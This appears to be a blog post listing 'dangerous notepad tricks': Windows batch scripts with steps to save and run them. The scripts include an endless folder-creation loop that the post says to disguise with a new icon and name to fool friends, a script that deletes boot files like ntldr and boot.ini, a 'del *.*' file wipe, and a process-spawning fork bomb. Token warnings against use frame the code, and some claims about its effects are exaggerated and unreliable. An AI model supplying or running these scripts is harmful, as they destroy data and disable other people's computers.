Top 5 Dangerous Notepad Tricks


Hi friends, here I post some really most dangerous notepad tricks. Before going to the section I give you the warning do not use it.




1. Create more than 3000 folders within minutes.

STEPS 

  1. Open your Notepad and type the following code.

@echo off
:top
md %random%
goto top


   2.  Save it as 1000.bat

@echo off makes your screen
blank but remember that it is creating the 1000's of folders. md %random% is command that is used to create multiple folder with random names. md is a command to make directory in ms-dos. goto top – return the command to the top such that creating the infinite loop. Remember that the 100's of folder will create at the place where you saved .bat file. Also note that this file is seems to be suspicious to your friends. So change the Icon and name of it.





2. How to Shutdown a computer forever?

CAUTION : Please don't use this code because it will Shutdown your computer forever. Use it only if you leaving the computer.


dangerous notepad tricks [Techzilla Firefox.blogspot.in]

STEPS 

1 Open your Notepad and type the following code.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

 2.  Save the file as “shutdown-forever.bat”. Just make sure that it has a .bat or .cmd  extension.


CAUTION :This will shutdown your computer for ever . Please don't use it.


NOTE: Paste it in NotePad And Save It with Extension .cmd or .bat. Remember you are  loosing your Computer so keep avoid it.






3. How to delete all your system file with a simple command?

STEPS 

       1. Open your Notepad and type the following code.


del *.*


       2. save it as a .bat file.

         Now all of your files from hard disk will vanish in less than 5-6mins.


CAUTION: Paste it in NotePad And Save It with .bat Extension . Remember you are  
                     loosing your Computer so keep avoid it.






4. RAM Crash Trick.


STEPS 

       1. Open your Notepad and type the following code.


    :A
    start 
    goto A

        2. save it as a .bat extension 


CAUTION: Paste it in NotePad And Save It with .bat Extension . Remember you are  

                     loosing your Computer so keep avoid it.





5. Crash a Computer System With Link.

This is nothing but a link. Javascript "exploit". Keep sure that do not run the program.






CAUTION:  DON'T USE IT. IT WILL DAMAGE YOUR SYSTEM. ONLY FOR 

KNOWLEDGE. WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…


                                                                 ENJOY!!!